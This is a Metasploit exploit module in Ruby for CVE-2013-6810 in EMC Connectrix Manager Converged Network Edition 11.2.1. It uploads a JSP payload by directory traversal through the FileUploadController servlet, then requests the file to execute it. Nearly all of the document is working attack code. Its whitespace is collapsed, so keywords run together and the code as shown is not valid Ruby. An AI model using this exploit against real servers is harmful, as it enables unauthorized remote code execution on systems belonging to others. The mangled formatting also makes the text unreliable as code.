require'msf/core'classMetasploitModule<Msf::Exploit::RemoteRank=GreatRanking
include Msf::Exploit::Remote::HttpClientdefinitialize(info ={})super(update_info(info,'Name'=>'EMC CMCNE FileUploadController Remote Code Execution','Description'=>%q{
This module exploits a fileupload vulnerability found in EMC
Connectrix Manager Converged Network Edition <= 11.2.1. The file
upload vulnerability is triggered when sending a specially crafted
filename to the FileUploadController servlet. This allows the
attacker to upload a malicious jsp file to anywhere on the remote
file system.
},'License'=>MSF_LICENSE,'Author'=>['james fitts'],'References'=>[['ZDI','13-279'],['CVE','2013-6810']],'Privileged'=>true,'Platform'=>'win','Arch'=>ARCH_JAVA,'Targets'=>[['EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ',{}],],'DefaultTarget'=>0,'DisclosureDate'=>'Dec 18 2013'))register_options([Opt::RPORT(80)],self.class)enddef exploit
peer ="#{datastore['RHOST']}:#{datastore['RPORT']}"
deploy ="..\\..\\..\\deploy\\dcm-client.war\\"
jsp = payload.encoded.gsub(/\x0d\x0a/,"").gsub(/\x0a/,"")@jsp_name="#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
data =Rex::MIME::Message.newdata.add_part("#{jsp}","application/octet-stream",nil,"form-data; name=\"source\"; filename=\"#{deploy}#{@jsp_name}\"")
data.add_part("#{rand_text_alpha_upper(5)}",nil,nil,"form-data; name=\"driverFolderName\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/,"--_Part_")print_status("#{peer} - Uploading the JSP Payload...")
res =send_request_cgi({'method'=>'POST','uri'=>normalize_uri("HttpFileUpload","FileUploadController.do"),'ctype'=>"multipart/form-data; boundary=#{data.bound}",'data'=> post_data
})if res.code ==200and res.body =~/SUCCESSFULLY UPLOADED FILES!/print_good("File uploaded successfully!")print_status("Executing '#{@jsp_name}' now...")
res =send_request_cgi({'method'=>'GET','uri'=>normalize_uri("dcm-client","#{@jsp_name}")})elseprint_error("Does not look like the files were uploaded to #{peer}...")endendend